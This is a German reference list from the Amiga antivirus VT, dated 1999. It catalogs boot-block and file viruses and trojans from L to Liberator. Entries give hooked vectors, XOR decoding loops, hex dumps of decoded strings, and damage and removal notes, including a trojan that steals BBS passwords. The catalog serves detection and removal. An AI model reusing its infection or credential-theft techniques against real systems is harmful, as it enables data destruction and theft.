home *** CD-ROM | disk | FTP | other *** search
/ Amiga Plus Special 24 / AMIGAplus Sonderheft 24 (2000)(Falke)(DE)[!].iso / Updates / Virus / VTTest3 / Schutz / VT.Dokumente / VT.kennt_L-Z < prev    next >
Text File  |  1999-11-06  |  420KB  |  8,905 lines

  1.  
  2.    VT3.15 kennt_L-Z:
  3.    =================
  4.                   (oder sollte erkennen)
  5.  
  6.    Stand: 99-02-11
  7.  
  8.    Heiner Schneegold
  9.    Am Steinert 8
  10.    97246 Eibelstadt
  11.    Deutschland
  12.    Tel. 09303/99104     (bitte nur 19.00 - 20.00 Uhr)
  13.    EMail: Heiner.Schneegold@t-online.de
  14.  
  15.  
  16.    - L.A.D.S     DoIo, KickTag, KickCheckSum, immer $7F400
  17.          versucht eine Taeuschung durch DisplayAlert beim Booten:
  18.             (Text auch im BB lesbar)
  19.                        L.A.D.S Virus Hunter
  20.                         No virus in memory
  21.                       Press any mouse button
  22.          Entgegen der Aussage findet KEIN Virustest statt, sondern das
  23.          eigene Programm wird resetfest installiert.
  24.          Vermehrung: jeder BB einer Disk OHNE Rueckfrage
  25.          bei Wert 5 in der Zaehlzelle:
  26.          veraendert x- und y-Koordinaten bei Mausbewegungen
  27.          sobald die Zaehlzelle den Wert 8 erreicht:
  28.          ein Teil des Virusprogramms wird entschluesselt mit
  29.                         eori.b #$41,(a0)+
  30.          und mit DisplayAlert ausgegeben:
  31.                   AMIGA COMPUTING Presents:
  32.                       The GREMLIN Virus
  33.              All Code (c) 1989 By Simon Rockman
  34.  
  35.          Hinweis: siehe auch MKV-Filevirus
  36.  
  37.  
  38.    - Labtec-Trojan      File
  39.          Gefunden in: NoCare27.lha
  40.          NoCare Impl-gepackt Laenge: 13556 Bytes
  41.          NoCare entpackt Laenge:     28848 Bytes
  42.          Im entpackten File ist zu lesen:
  43.            65206461 792e004c 65742773 20647562 e day..Let's dub
  44.            20746869 73206f6e 652c2074 6865204c  this one, the L
  45.            61627465 63205669 7275732c 206f6b3f abtec Virus, ok?
  46.            00733a73 74617274 75702d73 65717565 .s:startup-seque
  47.            6e636500 733a6e6f 63617265 00633a6c nce.s:nocare.c:l
  48.            6f616477 6200733a 75736572 2d737461 oadwb.s:user-sta
  49.            72747570 00733a73 74617274 75706969 rtup.s:startupii
  50.            00633a6c 68610063 3a617263 00633a7a .c:lha.c:arc.c:z
  51.            6f6f0063 3a656e64 69660073 79733a77 oo.c:endif.sys:w
  52.            62737461 72747570 2f766972 75735f63 bstartup/virus_c
  53.            6865636b 65720073 79733a77 62737461 hecker.sys:wbsta
  54.            72747570 2f766972 75737a00 633a233f rtup/virusz.c:#?
  55.            00507265 73732041 4e59204b 65792054 .Press ANY Key T
  56.            6f20476f 20426163 6b20546f 20444f53 o Go Back To DOS
  57.          Keine Vermehrung.
  58.          Keine verbogenen Vektoren
  59.          KS1.3 : Aktivierung der Zerstoerungsroutine auf A2000 68000
  60.                  Chip- und Fastmem nicht gelungen.
  61.          KS2.04: Abhaengig vom Datum (13.5.) . Das Jahr scheint keine
  62.                  Rolle zu spielen. Die Zerstoerungsroutine konnte mit
  63.                  1993 und 1994 aktiviert werden.
  64.          Ablauf: Es werden Files geloescht (Namen s.o.). Das Loeschen
  65.                  des ganzen Unterverzeichnisses C (c:#?) konnte nicht
  66.                  nachvollzogen werden. Danach wird ein Text im Cli
  67.                  ausgegeben:
  68.        Hi there! It`s probably been awhile since you`ve seen one of these
  69.        - a virus!  usw.
  70.          Wenn Sie jetzt SOFORT ein Undelete-Prg. aufrufen, werden Sie
  71.          die verlorenen Files mit grosser Wahrscheinlichkeit zurueck-
  72.          holen koennen.
  73.          VT bietet loeschen des Trojan-Files an.
  74.  
  75.    - Lame Game Virus   BB   TimeBomb V1.0 Clone  siehe unten
  76.          Text fuer DisplayAlert:
  77.            144a4553 55532120 57686174 2061206c .JESUS! What a l
  78.            616d6520 67616d65 21204920 6a757374 ame game! I just
  79.            20686164 20746f20 464f524d 41542069  had to FORMAT i
  80.            74212121 21210001 00000000 42b90007 t!!!!!......B...
  81.  
  82.    - LameBlame!    anderer Name: Taipan-LameBlame
  83.          Cool, DoIo  auch KS2.04
  84.          BB codiert mit Wert aus $DFF006
  85.          Schaeden:
  86.          Vermehrung mit BB
  87.          sobald Zaehlzelle 8 erreicht hat:
  88.          DisplayAlert: LameBlame! by Tai-Pan usw.
  89.          sonst nichts
  90.          Herkunft: Virusinstall V2.0
  91.          siehe auch: Chaos, Taipan-Chaos, CHEATER HIJACKER, POLISH,
  92.  
  93.    - Lamer-Varianten nach VT
  94.          - mit Kennung
  95.              - ABCD
  96.                 - bei $392 
  97.                   EOR-Byte an $391  
  98.                 - bei $396
  99.                    - EOR-Byte an $394    (45fa0350)   
  100.                    - EOR-Byte an $395    (45fa0351)
  101.                 - bei $3A6
  102.                   EOR-Byte an $00D
  103.                   verwendet auch ADD-Byte
  104.                 - bei $3AA
  105.                   EOR-Byte an $3A9
  106.                 - bei $3AE
  107.                   EOR-Byte an $3AD
  108.                 - bei $3F4
  109.                   EOR-Byte an $019
  110.                   verwendet auch ADD-Byte
  111.              - FEDC
  112.                 - bei $342
  113.                   EOR-Byte an $341
  114.          - ohne Kennung
  115.                 - Lamer-$362-Clist-V.
  116.                   EOR-Wort an $362       Wort, nicht mehr Byte
  117.                   ADD-Wort an $378
  118.                 - Lamer-$39a
  119.                   EOR-Wort bei $39A       Wort, nicht mehr Byte
  120.                   ADD-Wort bei $3B0      
  121.                 - Lamer-$3C2
  122.                   EOR-Wort bei $3C2       Wort, nicht mehr Byte
  123.                   ADD-Wort bei $3D4
  124.  
  125.    - Lamer-$00D-BB-Virus    
  126.          Kennung ABCD bei $3A6
  127.          EOR-Byte bei $00D und $3A5
  128.          ADD-Byte bei $3A1
  129.          fordert trackdisk.device    
  130.          FastMem ja, BeginIo, KickTag, KickCheckSum, SumKickData
  131.          Zerstoerung: schreibt Lamer! in irgendeinen Block und da 2 Bytes
  132.          uebrig bleiben am Schluss noch !!.
  133.          Im Speicher decodiert mit:
  134.                ADD.B D1,(A0)
  135.                EOR.B D0,(A0)+
  136.          Im BB ist decodiert zu lesen:   
  137.                              005420fc 4c616d65         .T .Lame
  138.            30fc7221 51c8fff4 30bc2121          0.r!Q...0.!!
  139.              ;....
  140.            fffc4e75 74726163 6b646973 6b2e6465 ..Nutrackdisk.de
  141.            76696365 00005468 65204c41 4d455220 vice..The LAMER
  142.            45787465 726d696e 61746f72 20212121 Exterminator !!!
  143.            009d0000 00ffabcd                   ........
  144.          Zerstoerter Block:
  145.            Block:    1348
  146.            4c616d65 72214c61 6d657221 4c616d65 Lamer!Lamer!Lame
  147.            72214c61 6d657221 4c616d65 72212121 r!Lamer!Lamer!La
  148.               ;......
  149.            4c616d65 72214c61 6d657221 4c616d65 Lamer!Lamer!Lame
  150.            72214c61 6d657221 4c616d65 72212121 r!Lamer!Lamer!!!
  151.          Der Block kann NICHT gerettet werden. Ein File, das diesen
  152.          Block vorher belegt hat, ist VERLOREN !
  153.  
  154.    - LAMER-$019-BB-Virus  
  155.          Kennung ABCD bei $3F4
  156.          EOR-Byte bei $019 und $3F3
  157.          ADD-Byte bei $3EF
  158.          fordert trackdisk.device
  159.          Virus-BB in Block 0 u. 1
  160.          Original-BB in Block 2 u. 3
  161.          Fastmem ja, BeginIo, KickTag, KickCheckSum, SumKickData
  162.          Zerstoerung: ein Datenblock (Test auf $8) wird mit
  163.                       AND.B D0,(A0)+ codiert .
  164.          decodiert mit:       ADD.B D1,(A0)
  165.                            EOR.B D0,(A0)+
  166.          Im BB ist decodiert zu lesen:  
  167.                                       73747261             stra
  168.            70007472 61636b64 69736b2e 64657669 p.trackdisk.devi
  169.            63650000 54686520 4c414d45 52204578 ce..The LAMER Ex
  170.            7465726d 696e6174 6f722021 2121000f terminator !!!..
  171.            00000017 abcd0000                   ........
  172.  
  173.    - LAMER-$341-BB-Virus
  174.          Kennung FEDC bei $342
  175.          EOR-Byte bei $341
  176.          fordert trackdisk.device
  177.          Zerstoerung: schreibt LAMER!
  178.          BeginIo, KickTag, KickCheckSum
  179.          decodiert mit:       EOR.B D0,(A0)+
  180.          Im BB ist decodiert zu lesen:
  181.            20fc4c41 4d4530fc 522151c8 fff430bc  .LAME0.R!Q...0.
  182.              ;....
  183.                     4e757472 61636b64 69736b2e     Nutrackdisk.
  184.            64657669 63650054 6865204c 414d4552 device.The LAMER
  185.            20457874 65726d69 6e61746f 72202121  Exterminator !!
  186.            2113fedc                            !...
  187.  
  188.    - Lamer-$362-Clist-V.
  189.          andere Namen: U.K.LamerStyle oder Lame Style U.K.
  190.          Diese Namen sind fuer mich nicht nachvollziehbar,
  191.          waehrend clist im Prg-Code vorkommt (s.u.).
  192.          Kennung: fehlt
  193.          EOR-Wort bei $362       Wort, nicht mehr Byte
  194.          ADD-Wort bei $378
  195.          fordert trackdisk.device
  196.          BeginIo, Kicktag, KickCheckSum
  197.          Vermehrung: ueber BB
  198.          Speicher fuer VirusHauptPrg wird ueber StructMemList besorgt
  199.          und !!!! mit allocabs eingetragen.  
  200.          Springt hinter das Virusteil, um sich zu decodieren.
  201.          Verwendet A1 statt A0
  202.          decodiert mit:       EOR.W D0,(A1)+        ($DFF006)
  203.                            ADD.W D1,D0
  204.          Im BB ist decodiert zu lesen: 
  205.                              65787061 6e73696f         expansio
  206.            6e207261 6d007472 61636b64 69736b2e n ram.trackdisk.
  207.            64657669 63650000 636c6973 742e6c69 device..clist.li
  208.            62726172 7900636c 69737420 33332e38 brary.clist 33.8
  209.            30202838 204f6374 20313938 36290d0a 0 (8 Oct 1986)..
  210.  
  211.  
  212.    - LAMER-$391-BB-Virus
  213.          Kennung ABCD bei $392
  214.          EOR-Byte bei $391
  215.          fordert trackdisk.device
  216.          Zerstoerung: schreibt LAMER!
  217.          FastMem ja, BeginIo, KickTag, KickCheckSum, SumKickData
  218.          decodiert mit:       EOR.B D0,(A0)+
  219.          Im BB ist decodiert zu lesen:   
  220.            00080003 661e303c 005420fc 4c414d45 ....f.0<.T .LAME
  221.            30fc5221 51c8fff4 30bc2121 137c0003 0.R!Q...0.!!.|..
  222.              ;....
  223.                     74726163 6b646973 6b2e6465     trackdisk.de
  224.            76696365 00005468 65204c41 4d455220 vice..The LAMER
  225.            45787465 726d696e 61746f72 20212121 Exterminator !!!
  226.            0009abcd                            ....
  227.  
  228.    - LAMER-$394-BB-Virus
  229.       Clone: STARCOM 4 siehe unten
  230.          Kennung ABCD bei $396
  231.          EOR-Byte bei $394     ($45fa0350)
  232.          FastMem ja, BeginIo, KickTag, KickCheckSum und SumKickData
  233.          Vermehrung: ueber BB
  234.          Zerstoerung: ueberschreibt einen Block mit 85 x LAMER! und da
  235.          zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird
  236.          mit $DFF006 ermittelt.
  237.          Speicher fuer VirusHauptPrg wird ueber SysStkLower besorgt.
  238.          zusaetzlich im Prg. noch Remove Node, Test auf Cool u. Cold .
  239.          decodiert in den Speicher mit:
  240.             EOR.B D0,(A0)+       
  241.          Im BB ist decodiert zu lesen: 
  242.            20fc4c41 4d4530fc 522151c8 fff430bc  .LAME0.R!Q...0.
  243.            2121137c                            !!.|
  244.               ;....
  245.                              74726163 6b646973         trackdis
  246.            6b2e6465 76696365 00546865 204c414d k.device.The LAM
  247.                              ^^
  248.            45522045 78746572 6d696e61 746f7220 ER Exterminator
  249.            21212100 b100abcd                   !!!.....
  250.  
  251.    - LAMER-$395-BB-Virus
  252.          Kennung ABCD bei $396
  253.          EOR-Byte bei $395     ($45fa0351)
  254.          FastMem ja, BeginIo, KickTag, KickCheckSum, SumKickData
  255.          fordert trackdisk.device
  256.          Zerstoerung: schreibt LAMER! in irgendeinen Block und da 2 Bytes
  257.          uebrig bleiben am Schluss noch !!
  258.          decodiert in den Speicher mit:
  259.             EOR.B D0,(A0)+       
  260.          Im BB ist decodiert zu lesen:      
  261.            20fc4c41 4d4530fc 522151c8 fff430bc  .LAME0.R!Q...0.
  262.            2121137c                            !!.|
  263.               ;....
  264.                              74726163 6b646973         trackdis
  265.            6b2e6465 76696365 00005468 65204c41 k.device..The LA
  266.                              ^^^^
  267.            4d455220 45787465 726d696e 61746f72 MER Exterminator
  268.            20212121 007fabcd                    !!!...
  269.  
  270.    - Lamer-39A-BB-Virus
  271.          andere Namen: Selfwriter, Pseudoselfwriter
  272.          Diese Namen sind fuer mich nicht nachvollziehbar 
  273.          Kennung: fehlt
  274.          EOR-Wort bei $39A       Wort, nicht mehr Byte
  275.          ADD-Wort bei $3B0
  276.          BeginIo, KickTag, KickCheckSum
  277.          fordert trackdisk.device
  278.          Vermehrung: ueber BB
  279.          Zerstoerung: ueberschreibt einen Block mit 85 x Lamer! und da
  280.          zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird
  281.          mit $DFF007 ermittelt.
  282.          Speicher fuer VirusHauptPrg wird ueber StructMemList besorgt
  283.          und !!!! mit allocabs eingetragen. (machen andere Lamer nicht)
  284.          Springt hinter das Virusteil, um sich zu decodieren.
  285.          Verwendet A1 statt A0
  286.          decodiert mit:       EOR.W D0,(A1)+        ($DFF006)
  287.                            ADD.W D1,D0
  288.          Im BB ist decodiert zu lesen:   
  289.            4c616d65 30fc7221 51c8fff4 30bc2121 Lame0.r!Q...0.!!
  290.               ;....
  291.                                       74726163             trac
  292.            6b646973 6b2e6465 76696365 00005468 kdisk.device..Th
  293.            65204c41 4d455220 45787465 726d696e e LAMER Extermin
  294.            61746f72 20212121 0000fe85 00000004 ator !!!........
  295.  
  296.    - LAMER-$3A9-BB-Virus
  297.          Kennung ABCD bei $3AA
  298.          EOR-Byte bei $3A9
  299.          fordert trackdisk.device
  300.          FastMem ja; BeginIo, KickTag, KickCheckSum und SumKickData
  301.          Vermehrung: ueber BB
  302.          Zerstoerung: ueberschreibt einen Block mit 85 x LAMER! und da
  303.          zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird
  304.          mit $DFF006 ermittelt..
  305.          Speicher fuer VirusHauptPrg wird ueber SysStkLower besorgt.
  306.          decodiert mit:       EOR.B D0,(A0)+     (immer neu mit $DFF007)
  307.          Im BB ist decodiert zu lesen:  
  308.                                       4c414d45             LAME
  309.            30fc5221 51c8fff4 30bc2121 137c0003 0.R!Q...0.!!.|..
  310.              ;....
  311.            61636b64 69736b2e 64657669 63650054 ackdisk.device.T
  312.            6865204c 414d4552 20457874 65726d69 he LAMER Extermi
  313.            6e61746f 72202121 2156abcd          nator !!!V..
  314.  
  315.    - LAMER-$3AD-BB-Virus  
  316.       Clone: siehe bei STARCOMReturn 
  317.          Kennung ABCD bei $3AE
  318.          EOR-Byte bei $3AD
  319.          fordert trackdisk.device
  320.          Zerstoerung: schreibt LAMER!
  321.       BeginIo, KickTag, KickCheckSum und SumKickData
  322.       Vermehrung: ueber BB
  323.       KS1.3: ja
  324.       Fastmem: nein
  325.       KS2.04: nicht gelungen
  326.       Zerstoerung: ueberschreibt einen Block mit 85 x LAMER! und da
  327.          zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird
  328.          mit $DFF006 ermittelt.
  329.       Speicher fuer VirusHauptPrg wird ueber StructMemList besorgt.
  330.          decodiert mit:       EOR.B D0,(A0)+     (immer neu mit $DFF007)
  331.          Im BB ist decodiert zu lesen:  
  332.            4c414d45 30fc5221 51c8fff4 30bc2121 LAME0.R!Q...0.!!
  333.              ;....
  334.            4e757472 61636b64 69736b2e 64657669 Nutrackdisk.devi
  335.            63650054 6865204c 414d4552 20457874 ce.The LAMER Ext
  336.            65726d69 6e61746f 72202121 218eabcd erminator !!!...  
  337.  
  338.    - Lamer-$3C2-BB-Virus
  339.          anderer Name: Rene
  340.          Dieser Name ist fuer mich nicht nachvollziehbar  
  341.          Kennung: fehlt
  342.          EOR-Wort bei $3C2       Wort, nicht mehr Byte
  343.          ADD-Wort bei $3D4
  344.          BeginIo, KickTag, KickCheckSum, SumKickData
  345.          fordert trackdisk.device
  346.          Vermehrung: ueber BB
  347.          Zerstoerung: Format alle LW
  348.          Springt hinter das Virusteil, um sich zu decodieren.
  349.          decodiert mit:       EOR.W D0,(A0)+        ($DFF006)
  350.                            ADD.W D1,D0
  351.          Im BB ist decodiert zu lesen:    
  352.                     74726163 6b646973 6b2e6465     trackdisk.de
  353.            76696365 00005468 65204c41 4d455220 vice..The LAMER
  354.            45787465 726d696e 61746f72 20212121 Exterminator !!!
  355.  
  356.    - LamerBBdefekt  BB   Empfehlung: sofort loeschen
  357.       Typ A:
  358.          Immer Guru. BB-CheckSum falsch. In eor-Schleife herumgepfuscht.  
  359.                        EOR.B D0,(A0)+
  360.                        EOR.L D2,D0       (D2 !!!!)
  361.       Typ B:
  362.          Immer GURU. Code im BB um mehrere Bytes verschoben. trackdisk.
  363.          device und LAMER am Schluss zu lesen.
  364.       Wahrscheinlich gibt noch mehr ????
  365.  
  366.    - Virusx-LAM-$3C2-Ins   haengt an VirusX  Laenge: 13192 Bytes
  367.       Wird im Speicher von VT als Lamer-$3C2 erkannt und entfernt.
  368.       Wichtig:
  369.       VirusX erkennt Lamer-$3C2 im Speicher NICHT !!!!!
  370.       Vermehrung:
  371.       NUR als Lamer-$3C2-Bootblock moeglich, NICHT als Linkfile !!!!
  372.       Deshalb in FileTest nur Loeschangebot.
  373.  
  374.    - Lamer! Exterminator-File  gepackt: 2260 Bytes (Zahl stimmt)
  375.                              ungepackt: 1824 Bytes
  376.       KS2.04: Ja
  377.       Verbogene Vektoren: siehe oben
  378.       Tarnung:
  379.       Fuehrt neben Installierung von Lameralt.BB im Speicher auch den
  380.       endcli-Befehl (KS1.3) aus. Aenderung gegenueber OrigBefehl:
  381.       process wird zu task, 2 Werte $52 werden zu $51
  382.       Vermehrung:
  383.       NUR als Lameralt-Bootblock moeglich, NICHT als Linkfile !!!!
  384.       Da jeder den endcli-Befehl in c hat (KS2.04 nicht mehr), gibt
  385.       es in FileTest nur Loeschangebot. Danach bitte von OrigWB endcli
  386.       nach c neu kopieren.
  387.       VT kennt: 16.10.92
  388.  
  389.    - LAMER-decode
  390.       Hinweis:
  391.       Es sind decodierte "Lamer"-Bootbloecke im Umlauf, bei denen Lamer
  392.       Exterminator im BB zu lesen ist. Diese BBe sind NICHT bootfaehig
  393.       da ja beim Booten die Codier-Routine ausgefuehrt wird. Es wird
  394.       dann also Codiert anstatt Decodiert.
  395.  
  396.    - Lamer-LoadWB  FileVirus Laenge: 4172 Bytes
  397.       KickTag, KickCheckSum, SumKickData, BeginIo
  398.       in SubDir c
  399.       in LoadWB sichtbar: The LAMER Exterminator !!!
  400.       Virus haengt vor dem LoadWB-Teil
  401.       Schreibt zuerst das Virusprogramm in den Speicher und fuehrt dann
  402.       den LoadWB-Befehl aus.
  403.       Kann sich nicht als LoadWb vermehren, sondern schreibt einen
  404.       Lamer-BB
  405.  
  406.    - Lamer Bomb     anderer Name: Gotcha LAMER   s.o.
  407.  
  408.    - LamerFry-Trojan    File
  409.       Laenge gepackt: 8240 Bytes
  410.       Bezeichnet sich durch Textausgabe ins Cli selbst als Test-Virus.
  411.       Aus dem Speicherauszug kann man ersehen, dass es sich um einen
  412.       Liberator5.0-Clone (Behandlung s.u.) mit geaendertem Text aber
  413.       gleichem Verhalten handelt.
  414.           722e6465 76696365 003a632f 72756e00 r.device.:c/run.
  415.           3a632f62 72003a73 2f2e696e 666f2000 :c/br.:s/.info .
  416.           3a632f00 732f7374 61727475 702d7365 :c/.s/startup-se
  417.           7175656e 63650073 2f736865 6c6c2d73 quence.s/shell-s
  418.           74617274 7570003b 4c616d65 72204672 tartup.;Lamer Fr
  419.           79202d20 53617973 20596f75 20446965 y - Says You Die
  420.           20212121 0a616c69 61732063 6f707920  !!!.alias copy
  421.           64656c65 74650a61 6c696173 2064656c delete.alias del
  422.           65746520 22656368 6f202a22 4e6f2066 ete "echo *"No f
  423.           696c6520 746f2064 656c6574 652c2063 ile to delete, c
  424.           616e2774 2066696e 642a2222 00732f2e an't find*"".s/.
  425.           696e666f 20002e66 61737464 6972a020 info ..fastdir.
  426.           00630063 2f00632f 72756e00 632f6272 .c.c/.c/run.c/br
  427.           00627220 633a000a 002e6661 73746469 .br c:....fastdi
  428.           72003a73 2f737461 72747570 2d736571 r.:s/startup-seq
  429.  
  430.    - LamerKiller    File
  431.       anderer Name: DiVa-SADDAM-Inst.
  432.       Laenge gepackt: 11512 Bytes
  433.       KS1.3 Ja
  434.       KS2.04  GURU3
  435.       Verbogene Vektoren: Cold, BeginIo usw.
  436.       Installiert SADDAM-Disk-Validator  (codiert IRAK)
  437.       Keine Meldung im Cli
  438.  
  439.    - Lame Style U.K.  siehe bei Clist-Virus
  440.    - LamerStyle U.K.  siehe bei Clist-Virus
  441.  
  442.    - Laureline-Virus   BB
  443.       Typ A immer ab $6E800
  444.       Typ B immer ab $6B500   (nicht vorhanden)
  445.       KS1.3 : ja
  446.       KS2.04: ja
  447.       Verwendet AllocMem NICHT
  448.       Fordert trackdisk.device NICHT
  449.       Verbogenen Vektoren: Cool, Warm, DoIo
  450.       BB-Teile codiert
  451.       Namensbegruendung: decodiert mit  eor.b d7,(a3)+  ist im BB zu
  452.       lesen:
  453.            00000000 00010000 000000d2 0e546865 .............The
  454.            204c6175 72656c69 6e652056 69727573  Laureline Virus
  455.            2056312e 30000100 f21e436f 64652062  V1.0.....Code b
  456.       Schaeden und Vermehrung: BB
  457.       Meldung: Mit DisplayAlert
  458.       vorher wird ueberprueft:
  459.           - rechte Maustaste
  460.           - Zaehlzelle mind #35
  461.  
  462.  
  463.    - Laurin-Virus  SADDAM-Clone  Wird von VT als SADDAM-Clone erkannt.
  464.       Blocklangwort: $a0a0a0a0
  465.       Namensbegruendung: im Speicher ist decodiert zu lesen
  466.            74726163 6B646973 6B2E6465 76696365 trackdisk.device
  467.            00010820 4C617572 696E2056 69727573 ... Laurin Virus
  468.       Behandlung: siehe bei SADDAM
  469.  
  470.  
  471.    - Lazarus    Diskname
  472.       KEIN Virus
  473.       Wird von VT NICHT erkannt.
  474.       Die Disk war defekt und wurde von einem User mit dem Commodore-
  475.       Programm diskdoctor behandelt. Bei neueren WB liegt dieses Pro-
  476.       gramm nicht mehr im C-Verzeichnis. Geruechte behaupten, die Disks
  477.       waeren danach schlimmer verwuestet als vorher. Meine Empfehlung:
  478.       Verwenden Sie disksalv2 oder ein aehnliches Programm.
  479.             Fileauszug aus diskdoctor:
  480.            726d6174 202d2053 6f727279 210a0000 rmat - Sorry!...
  481.            074c617a 61727573 30556e61 626c6520 .Lazarus0Unable
  482.            746f2077 72697465 20746f20 726f6f74 to write to root
  483.  
  484.  
  485.    - le RoLE   franz. Name fuer Return of The Lamer Exterminator  s.u.
  486.  
  487.    - LEVIATHAN-Virus  BB und File (Laenge 1056 Bytes)
  488.          Cool $7F89A  nach Reset: DoIo $7FAB4  OldOpenLib $7F8E2
  489.          KS1.3 : ja  KS2.04 : nach RESET Endlosreset (Computer ausschalten)
  490.          Fordert trackdisk.device NICHT
  491.          Namensbegruendung: im BB und im File ist zu lesen:
  492.           -=- LEVIATHAN -=-
  493.          Vermehrung und Schaeden:
  494.          Beim ersten Start des Programms wird nur Cool verbogen. Nach
  495.          einem Reset werden dann DoIo und OldOpenLib verbogen.
  496.          Vermehrung als BB:
  497.          Findet mit verbogenen DoIo statt, wenn ein lesender Zugriff
  498.          auf Block 880 (nur bei DD-Disk Rootblock) stattfindet. Das
  499.          Virusteil wird nach $7F000 kopiert und einige NOPs durch den
  500.          BB-Header ersetzt.
  501.          Abhilfe: neuen Original-BB mit VT aufkopieren.
  502.          Vermehrung als File:
  503.          Findet mit verbogenem OldOpenLib-Vektor immer auf sys: statt.
  504.          Es wird ein Test auf schon verseucht durchgefuehrt.
  505.             79007379 733a732f 73746172 7475702d y.sys:s/startup-
  506.             73657175 656e6365 00007379 733a732f sequence..sys:s/
  507.             c0000000 03f30000 00000000 00010000 ................
  508.          Die erste Zeile der s-seq wird eingefuegt:
  509.          startup-sequence Original:
  510.             636c730a 0a000000 00000000 00000000 cls.............
  511.          startup-sequence verseucht:
  512.             732fc00a 636c730a 0a000000 00000000 s/..cls.........
  513.          Das Virusprogramm selbst wird nach s mit Namen $C0 kopiert
  514.          (siehe oben). Laenge des Virusfiles 1056 Bytes. Der File-
  515.          name ist als Sonderbuchstabe A sichtbar.
  516.          Abhilfe: Loeschen Sie mit VT das Virusfile in s .
  517.                   Vergessen Sie bitte nicht mit einem Editor, die
  518.                   erste Zeile in der Startup-Sequence zu loeschen.
  519.          Allgemein:
  520.          Sowohl mit dem BB als auch mit dem File waren BEIDE Ver-
  521.          seuchungstypen zu erreichen.
  522.          Im Virus steckt noch ein codierter Text, der NIE erreicht
  523.          wird:
  524.             005e4611 0a190027 51c8fff8 594f5520 .^F....'Q...YOU
  525.             41524520 54484520 4f574e45 52204f46 ARE THE OWNER OF
  526.             2041204e 45572047 454e4552 4154494f  A NEW GENERATIO
  527.             4e204f46 20564952 55532120 49542046 N OF VIRUS! IT F
  528.             55434b53 20594f55 52205354 41525455 UCKS YOUR STARTU
  529.             502d5345 5155454e 43452120 48415645 P-SEQUENCE! HAVE
  530.             2046554e 2e2e2e2e 20000000           FUN.... ...
  531.  
  532.    - LHA3.0-Trojan  siehe bei CoP-Trojan
  533.  
  534.    - LHACHECK-BBS-Trojan     Laenge ungepackt: 3836 Bytes
  535.          Einbruchswerkzeug   Keine verbogenen Vektoren
  536.          Keine Vermehrung
  537.          Soll nach Text im File (usage):
  538.              - defekte Lha-Archive erkennen und loeschen
  539.              - BBS-Adverts anhaengen oder loeschen
  540.          Im File ist weiter zu lesen:
  541.             00322456 45523a20 4c484143 4845434b .2$VER: LHACHECK
  542.             20312e31 20283139 2e30322e 39342920  1.1 (19.02.94)
  543.             62792042 6c616465 2f4e6f43 7261636b by Blade/NoCrack
  544.                ;......
  545.             0000474f 442d4642 54522e4c 48410000 ..GOD-FBTR.LHA..
  546.          Decodiert mit  eor.l d0,(a0)+  kann man dann aber auch noch
  547.          lesen:
  548.             536e6f6f 70446f73 0052414d 3a4d312e SnoopDos.RAM:M1.
  549.             44415800 4242533a 55534552 2e444154 DAX.BBS:USER.DAT
  550.             41000000 00000000 00000000 00000000 A...............
  551.          Das Trojan-Teil startet nicht, falls SnoopDos gefunden wird.
  552.          Es wird dann nur der LHACHECK-Teil ausgefuehrt.
  553.          VT bietet Loeschen an.
  554.          Ein Ausbau ist nicht moeglich, da das Trojan-Teil eingearbeitet
  555.          ist. Besorgen Sie sich bitte das Original-LHACHECK-File, falls
  556.          es das Teil gibt.
  557.  
  558.    - LHAV3-BBS-Trojan   File
  559.          Verlaengert ein File um #848 Bytes
  560.          Keine verbogenen Vektoren
  561.          Keine Vermehrungsroutine
  562.          VT erkennt BBS-Virus
  563.          vgl. auch 1.Hunk bei Viewtek22-Installer. Da ist das Teil
  564.          ein paar Bytes laenger.
  565.          Vermutlich ein Angriff auf FastCall mit bestimmten Files s.u. .
  566.          VT bietet Ausbau an.
  567.          Das LHA-Programm meldet sich bei mir im Cli mit V 3.035 1994 .
  568.          Nach meinem Wissensstand gibt es im Sept. 94 noch gar kein
  569.          LHA-Version 3 .
  570.                 Auszug aus dem 1.Hunk (ist uncodiert zu lesen):
  571.               6c696272 61727900 533a4861 75707450 library.S:HauptP
  572.               66616400 55736572 2f537973 4f702f55 fad.User/SysOp/U
  573.               73657244 6174656e 00426f78 44617465 serDaten.BoxDate
  574.               6e2f426f 78506172 616d6574 65720055 n/BoxParameter.U
  575.               7365722f 536e6f6f 70792f2e 494e4445 ser/Snoopy/.INDE
  576.               58005573 65722f53 6e6f6f70 792f2e54 X.User/Snoopy/.T
  577.               58540041 6273656e 64657220 203a2053 XT.Absender  : S
  578.               6e6f6f70 790a4265 74726566 66202020 noopy.Betreff
  579.          Hinweis eines Anwenders (Juli 95) : Danke
  580.          Aufgrund  des  vorliegenden  Textes, kann man davon ausgehen, dass
  581.          das Programm folgendes macht:
  582.          Öffnen von S:Hauptpfad
  583.          Lesen der ersten Zeile (Pfad von Fastcall).
  584.          Öffnen der Userdaten vom Sysop und auslesen der Sysoppsw.
  585.          Öffnen der Boxdaten und auslesen des DOS-Passwortes.
  586.          Öffnet beim User Snoopy das File .index (Offsetdaten fuer Briefe)
  587.          und fuegt einen neuen Brief ein.
  588.          Öffnen des Files .txt (Der Brief selber) und hineinschreiben des
  589.          Passwortes fuer den Sysop und des DOS-Passwortes.
  590.  
  591.  
  592.    - Liberator virus v1.21  anderer Name: MemCheck s.u.
  593.  
  594.    - Liberator Virus V3.0  Laenge: ungepackt 10712 (ich hab nur die un-
  595.          gepackte Version, deshalb erkennt VT auch nur das ungepackte
  596.          File !!!)
  597.          Namensbegruendung: s.u.
  598.          KS2.04: JA    68030: JA
  599.          bleibt NICHT im Speicher nach Aenderung von .fastdir .
  600.          Richtiger Name fuer das File: cv
  601.          Versucht durch Cli-Ausgabe zu taeuschen:
  602. Check Vectors rev 5.1  All Rights Reserved  more TUPperware © by Mike Hansell
  603. Reset vectors ok, Nothing resident, Trackdisk.device not intercepted,
  604. DoIO ok, VBlank ok, dos.library not intercepted.
  605. System appears to be free of viruses and trojans!
  606.  
  607.          Legt in Wirklichkeit .fastdir an (bei mir auf 3 SCSI-HD in einem
  608.          Durchlauf). Laenge: 2/3 Bytes . Startwert auf allen Festplatten
  609.          in .fastdir  $310a = 1 Return  . Hinweis: .fastdir hat danach im
  610.          Namen noch 2 leerzeichen ($20)  Auszug aus FileheaderBlock:
  611.                   0         0         0 ............
  612.                13f1       3d5       484 ............
  613.             a2e6661  73746469  72202000 ..fastdir  .
  614.                   0         0         0 ............
  615.  
  616.  
  617.          Schreibt in :s/startup-sequence: cv >NIL:
